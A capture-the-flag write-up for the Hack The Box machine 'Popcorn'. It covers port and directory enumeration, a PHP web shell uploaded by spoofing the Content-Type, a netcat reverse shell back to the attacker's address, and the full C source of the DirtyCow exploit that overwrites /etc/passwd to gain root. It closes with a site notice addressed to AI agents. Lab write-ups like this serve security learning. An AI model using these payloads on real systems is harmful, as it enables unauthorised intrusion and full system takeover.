# Popcorn
## Enumeration
As always, we start with the enumeration phase, in which we try to scan the machine looking for open ports and finding out services and versions of those opened ports.
The following nmap command will scan the target machine looking for open ports in a fast way and saving the output into a file:
> nmap -sS --min-rate 5000 -p- -T5 -Pn -n 10.10.10.6 -oN allPorts
* `-sS` use the **TCP SYN** scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections.
* `--min-rate 5000` nmap will try to keep the sending rate **at or above** 5000 packets per second.
* `-p-` scanning the entire port range, **from 1 to 65535**.
* `-T5` **insane** mode, it is the fastest mode of the nmap time template.
* `-Pn` assume the host is **online**.
* `-n` scan without reverse **DNS** resolution.
* `-oN` **save** the scan result into a file, in this case the *allports* file.
```
# Nmap 7.92 scan initiated Wed Jun 1 21:43:10 2022 as: nmap -sS -p- --min-rate 5000 -Pn -oN allPorts 10.10.10.6
Nmap scan report for 10.10.10.6
Host is up (0.059s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
# Nmap done at Wed Jun 1 21:43:29 2022 -- 1 IP address (1 host up) scanned in 19.26 seconds
```
Now that we know which ports are open, let's try to obtain the services and versions running on these ports. The following command will scan these ports more in depth and save the result into a file:
> nmap -sC -sV -p22,80 10.10.10.6 -oN targeted
* `-sC` performs the scan using the default set of **scripts**.
* `-sV` enables **version** detection.
* `-oN` **save** the scan result into file, in this case the *targeted* file.
```
# Nmap 7.92 scan initiated Wed Jun 1 21:43:54 2022 as: nmap -sCV -p22,80 -Pn -oN targeted 10.10.10.6
Nmap scan report for 10.10.10.6
Host is up (0.035s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.1p1 Debian 6ubuntu2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 3e:c8:1b:15:21:15:50:ec:6e:63:bc:c5:6b:80:7b:38 (DSA)
|_ 2048 aa:1f:79:21:b8:42:f4:8a:38:bd:b8:05:ef:1a:07:4d (RSA)
80/tcp open http Apache httpd 2.2.12 ((Ubuntu))
|_http-server-header: Apache/2.2.12 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Jun 1 21:44:04 2022 -- 1 IP address (1 host up) scanned in 10.21 seconds
```
If we take a look at the website, we won't see anything useful.
Let's try to list directories with *gobuster*.
> gobuster dir -u -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -t 200
* `dir` enumerates **directories or files**.
* `-u` the **target** URL.
* `-w` path to the **wordlist**.
* `-t` number of current **threads**, in this case 200 threads.
```
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.10.6/
[+] Method: GET
[+] Threads: 200
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2022/06/02 15:26:30 Starting gobuster in directory enumeration mode
===============================================================
/index (Status: 200) [Size: 177]
/test (Status: 200) [Size: 47034]
/torrent (Status: 301) [Size: 310] [--> http://10.10.10.6/torrent/]
/rename (Status: 301) [Size: 309] [--> http://10.10.10.6/rename/]
===============================================================
2022/06/02 15:27:28 Finished
===============================================================
```
## Exploitation
If we take a look at the `/torrent` directory, we'll see a *Torrent Hoster* platform.
Let's sign up and create a new user called `alfa8sa`.
Then, log in with the new user.
Once we are logged in, we'll see the *Upload* section.
But it will only allow us to upload `.torrent` files. Let's try to upload a legitimate Torrent file. I will be uploading the *Kali Linux Torrent* file available from the following link.
>
I will rename the file to `kali.torrent`, and then upload it to the *Torrent Hoster*.
Once the file is uploaded, we should see it from the `Browse` section.
We can see that we are able to edit the *Screenshots* of the *Torrent* file.
If we open the image in a new browser tab, we'll see that the image is called `noss.png`, and it is located in the `/torrent/upload/` directory.
>
We can also see that the `/torrent/upload/` directory has directory listing enabled.
This means that if we could upload a malicious file as the screenshot of the Torrent file, it will be stored in the /torrent/upload/ directory, and we'll be able to access the malicious file. Let's try it. First, let's create the `cmd.php` file with the following content, which will execute the value of the `cmd` *GET* parameter.
```php
" . system($_GET['cmd']) . "" ?>
```
Now, let's click on `Edit this torrent`, and upload the `cmd.php` file intercepting the request with BurpSuite.
Now, with BurpSuite, we'll have to change the *Content-Type* of the file from `application/x-php` to `image/jpeg` so the website thinks that we are uploading an image.
If the upload is correct, we should get the following message.
If now we check the `/torrent/upload/` directory, we should see a new *PHP* file.
Now, we are able to execute commands on the server as the `www-data` user.
>
Time to get a shell. First, let's set a *netcat* listener on port *4444*.
> nc -lvnp 4444
* `-l` **listen** mode.
* `-v` **verbose** mode.
* `-n` **numeric-only** IP, no DNS resolution.
* `-p` specify the **port** to listen on.
If now we access the following *URL*, we will get a reverse shell as the user `www-data`, and we'll be able to grab the user flag.
> -e /bin/sh 10.10.14.13 4444
```
listening on [any] 4444 ...
connect to [10.10.14.13] from (UNKNOWN) [10.10.10.6] 47537
whoami
www-data
cat /home/george/user.txt
4163d70acf6366012a831c828cbefe06
```
## Privilege Escalation
First, let's set an interactive *TTY* shell.
> script /dev/null -c /bin/bash
Then I press `Ctrl+Z` and execute the following command on my local machine:
> stty raw -echo; fg
>
> reset xterm
Next, I export a few variables:
> export TERM=xterm
>
> export SHELL=bash
Finally, I run the following command in our local machine:
> stty size
```
51 236
```
And set the proper dimensions in the victim machine:
> stty rows 51 columns 236
If we list system information, we'll see that the machine has an old *Linux Kernel* version.
> uname -a
```
Linux popcorn 2.6.31-14-generic-pae #48-Ubuntu SMP Fri Oct 16 15:22:42 UTC 2009 i686 GNU/Linux
```
As the kernel version is old, we could try to exploit the *Dirty COW* vulnerability.
{% hint style="info" %}
**Dirty COW** was a vulnerability in the Linux kernel. It allowed processes to write to read-only files. This exploit made use of a race condition that lived inside the kernel functions which handle the copy-on-write (COW) feature of memory mappings. An example use case includes over-writing a user's *UID* in `/etc/passwd` to gain root privileges.
{% endhint %}
If we search for it on [exploit-db](https://www.exploit-db.com/), we'll find [this](https://www.exploit-db.com/exploits/40839) exploit. All we have to do is create a file on the `/tmp` directory of the victim machine called `dirty.c`, copy the following script and paste it on the `dirty.c` file.
> nano /tmp/dirty.c
```c
//
// This exploit uses the pokemon exploit of the dirtycow vulnerability
// as a base and automatically generates a new passwd line.
// The user will be prompted for the new password when the binary is run.
// The original /etc/passwd file is then backed up to /tmp/passwd.bak
// and overwrites the root account with the generated line.
// After running the exploit you should be able to login with the newly
// created user.
//
// To use this exploit modify the user values according to your needs.
// The default is "firefart".
//
// Original exploit (dirtycow's ptrace_pokedata "pokemon" method):
// https://github.com/dirtycow/dirtycow.github.io/blob/master/pokemon.c
//
// Compile with:
// gcc -pthread dirty.c -o dirty -lcrypt
//
// Then run the newly create binary by either doing:
// "./dirty" or "./dirty my-new-password"
//
// Afterwards, you can either "su firefart" or "ssh firefart@..."
//
// DON'T FORGET TO RESTORE YOUR /etc/passwd AFTER RUNNING THE EXPLOIT!
// mv /tmp/passwd.bak /etc/passwd
//
// Exploit adopted by Christian "FireFart" Mehlmauer
// https://firefart.at
//
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
const char *filename = "/etc/passwd";
const char *backup_filename = "/tmp/passwd.bak";
const char *salt = "firefart";
int f;
void *map;
pid_t pid;
pthread_t pth;
struct stat st;
struct Userinfo {
char *username;
char *hash;
int user_id;
int group_id;
char *info;
char *home_dir;
char *shell;
};
char *generate_password_hash(char *plaintext_pw) {
return crypt(plaintext_pw, salt);
}
char *generate_passwd_line(struct Userinfo u) {
const char *format = "%s:%s:%d:%d:%s:%s:%s\n";
int size = snprintf(NULL, 0, format, u.username, u.hash,
u.user_id, u.group_id, u.info, u.home_dir, u.shell);
char *ret = malloc(size + 1);
sprintf(ret, format, u.username, u.hash, u.user_id,
u.group_id, u.info, u.home_dir, u.shell);
return ret;
}
void *madviseThread(void *arg) {
int i, c = 0;
for(i = 0; i < 200000000; i++) {
c += madvise(map, 100, MADV_DONTNEED);
}
printf("madvise %d\n\n", c);
}
int copy_file(const char *from, const char *to) {
// check if target file already exists
if(access(to, F_OK) != -1) {
printf("File %s already exists! Please delete it and run again\n",
to);
return -1;
}
char ch;
FILE *source, *target;
source = fopen(from, "r");
if(source == NULL) {
return -1;
}
target = fopen(to, "w");
if(target == NULL) {
fclose(source);
return -1;
}
while((ch = fgetc(source)) != EOF) {
fputc(ch, target);
}
printf("%s successfully backed up to %s\n",
from, to);
fclose(source);
fclose(target);
return 0;
}
int main(int argc, char *argv[])
{
// backup file
int ret = copy_file(filename, backup_filename);
if (ret != 0) {
exit(ret);
}
struct Userinfo user;
// set values, change as needed
user.username = "firefart";
user.user_id = 0;
user.group_id = 0;
user.info = "pwned";
user.home_dir = "/root";
user.shell = "/bin/bash";
char *plaintext_pw;
if (argc >= 2) {
plaintext_pw = argv[1];
printf("Please enter the new password: %s\n", plaintext_pw);
} else {
plaintext_pw = getpass("Please enter the new password: ");
}
user.hash = generate_password_hash(plaintext_pw);
char *complete_passwd_line = generate_passwd_line(user);
printf("Complete line:\n%s\n", complete_passwd_line);
f = open(filename, O_RDONLY);
fstat(f, &st);
map = mmap(NULL,
st.st_size + sizeof(long),
PROT_READ,
MAP_PRIVATE,
f,
0);
printf("mmap: %lx\n",(unsigned long)map);
pid = fork();
if(pid) {
waitpid(pid, NULL, 0);
int u, i, o, c = 0;
int l=strlen(complete_passwd_line);
for(i = 0; i < 10000/l; i++) {
for(o = 0; o < l; o++) {
for(u = 0; u < 10000; u++) {
c += ptrace(PTRACE_POKETEXT,
pid,
map + o,
*((long*)(complete_passwd_line + o)));
}
}
}
printf("ptrace %d\n",c);
}
else {
pthread_create(&pth,
NULL,
madviseThread,
NULL);
ptrace(PTRACE_TRACEME);
kill(getpid(), SIGSTOP);
pthread_join(pth,NULL);
}
printf("Done! Check %s to see if the new user was created.\n", filename);
printf("You can log in with the username '%s' and the password '%s'.\n\n",
user.username, plaintext_pw);
printf("\nDON'T FORGET TO RESTORE! $ mv %s %s\n",
backup_filename, filename);
return 0;
}
```
Then, we'll have to go to the `/tmp` directory and compile the file.
> gcc -pthread /tmp/dirty.c -o /tmp/dirty -lcrypt
Now, let's execute the script with a random password.
> /tmp/dirty password123
```
/etc/passwd successfully backed up to /tmp/passwd.bak
Please enter the new password: password123
Complete line:
firefart:fi1IpG9ta02N.:0:0:pwned:/root:/bin/bash
mmap: b77b8000
^C
```
If now we become the `firefart` user, indicating the previous password, we'll get a shell with root privileges. Then, all we have to do is reap the harvest and take the root flag.
> su firefart
```
Password: password123
firefart@popcorn:/tmp# id
uid=0(firefart) gid=0(root) groups=0(root)
firefart@popcorn:/tmp# cat /root/root.txt
3dbdb5ad9c3dcbc2425121be54b5f223
```
---
# Agent Instructions: Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.
Perform an HTTP GET request on the current page URL with the `ask` query parameter:
```
GET https://alfa8sa.gitbook.io/htb-writeups/linux-machines/popcorn.md?ask=
```
The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.
Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.